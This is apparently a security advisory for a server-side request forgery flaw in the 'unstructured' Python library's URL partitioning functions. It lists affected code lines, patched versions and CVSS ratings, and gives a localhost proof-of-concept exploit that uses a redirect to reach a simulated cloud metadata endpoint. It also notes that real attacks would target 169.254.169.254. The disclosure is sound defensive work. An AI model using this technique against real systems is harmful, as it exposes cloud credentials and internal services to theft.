unstructured: Server-Side Request Forgery in the URL-based partitioning
漏洞描述
### Summary Server-Side Request Forgery in `unstructured`. The `url=` argument of `partition()`, `partition_html()`, and `partition_md()` is fetched via `requests.get()` with no host validation. The response body is returned as `Element` text, so this is a **full-read SSRF** — attackers reach loopback admin APIs, internal HTTP services, and cloud metadata endpoints, and read the response. `unstructured` is the de facto URL ingestion layer for LangChain `UnstructuredURLLoader`, LlamaIndex `UnstructuredReader`, Chainlit, and many agent frameworks — secure defaults must live in the library, not in every downstream caller. ### Details Three sinks, all in `unstructured == 0.22.26` (verified on `main` at `199f255`): - `unstructured/partition/auto.py:303` — `file_and_type_from_url()`, reached via `partition(url=…)`. - `unstructured/partition/html/partition.py:160` — `partition_html(url=…)`. Post-fetch `Content-Type` check runs after the request hits the target. - `unstructured/partition/md.py:96` — `partition_md(url=…)`. No timeout (SSRF + slow-loris DoS). None of `is_private`, `is_loopback`, `ipaddress`, `gethostbyname`, or `allow_redirects` appear in any of the three files. Three exploitation paths apply: direct private-IP target; redirect bypass (`allow_redirects=True` default); DNS rebinding (TOCTOU, closeable only by socket-pinning). Affected since `0.4.7` (Feb 2023) — ~219 releases, no validation ever introduced. ### PoC Local-only. `pip install unstructured==0.22.26 flask requests`. `internal_server.py`: ```python from flask import Flask, Response, jsonify app = Flask(__name__) @app.route("/imds") def imds(): return jsonify({"AccessKeyId": "ASIA-FAKE", "SecretAccessKey": "FAKE/SECRET"}) @app.route("/internal.html") def html(): return Response("<html><body><p>SK_LEAK_42</p></body></html>", mimetype="text/html") @app.route("/redir") def redir(): return Response("", 302, headers={"Location": "http://127.0.0.1:9999/imds"}) if __name__ == "__main__": app.run(host="127.0.0.1", port=9999) ``` `exploit.py` — uses the public top-level API: ```python # Stub NLP helpers so the offline sandbox skips spaCy model download. # Does NOT affect the SSRF (which lives in the URL fetcher, before NLP). import unstructured.nlp.tokenize as _tk, unstructured.partition.text_type as _tt _tk.sent_tokenize = _tt.sent_tokenize = lambda t: [s for s in (t or "").split(". ") if s] _tk.word_tokenize = _tt.word_tokenize = lambda t: (t or "").split() _tk.pos_tag = _tt.pos_tag = lambda t: [(w, "NN") for w in (t or "").split()] from unstructured.partition.auto import partition L = "http://127.0.0.1:9999" # A: partition(url=...) leaks internal HTML body assert "SK_LEAK_42" in "\n".join(str(e) for e in partition(url=f"{L}/internal.html", languages=["eng"])) # B: redirect bypass reaches simulated IMDS assert "SecretAccessKey" in "\n".join(str(e) for e in partition(url=f"{L}/redir", languages=["eng"])) print("PoC OK") ``` In production the attacker substitutes `169.254.169.254`, `metadata.google.internal`, or any internal address. ### Impact Attacker capabilities: - **Internal HTTP service read** — loopback admin consoles, internal Elasticsearch/Redis/Consul/etcd HTTP fronts, Kubernetes API server, social/internal microservices. This is the most broadly exploitable capability and is unaffected by any cloud-side hardening. - **Cloud instance metadata access** — reads metadata services that respond to unauthenticated GETs: GCP (`metadata.google.internal`), Azure IMDS, Oracle Cloud, DigitalOcean, and EC2 instances still configured for IMDSv1 (which remains widely deployed in older accounts and in services that do not enforce IMDSv2-only). EC2 instances configured as IMDSv2-only are not exposed to direct credential theft via this SSRF, since IMDSv2 requires a `PUT` for token acquisition; the SSRF still reaches the endpoint for reconnaissance and surface-mapping. - **Side-effecting GET endpoints** — magic-link consumers, job triggers, link-preview generators reachable on internal networks. - **Internal network reconnaissance** — connection success/failure timing and error messages serve as a port and service scanner. Source Code Location: https://github.com/Unstructured-IO/unstructured Affected Packages: - pip:unstructured, affected >= 0.4.7, < 0.24.0, patched in 0.24.0 CWEs: - CWE-601: URL Redirection to Untrusted Site ('Open Redirect') - CWE-918: Server-Side Request Forgery (SSRF) CVSS: - Primary: score 9.3, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N - CVSS_V3: score 9.3, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N References: - https://github.com/Unstructured-IO/unstructured/security/advisories/GHSA-4mvj-m6j5-pmf7 - https://nvd.nist.gov/vuln/detail/CVE-2026-71428 - https://github.com/Unstructured-IO/unstructured/pull/4388 - https://github.com/Unstructured-IO/unstructured/commit/445c95735c4045057f51f399bc04c657751923bd - https://github.com/Unstructured-IO/unstructured/releases/tag/0.24.0 - https://github.com/advisories/GHSA-4mvj-m6j5-pmf7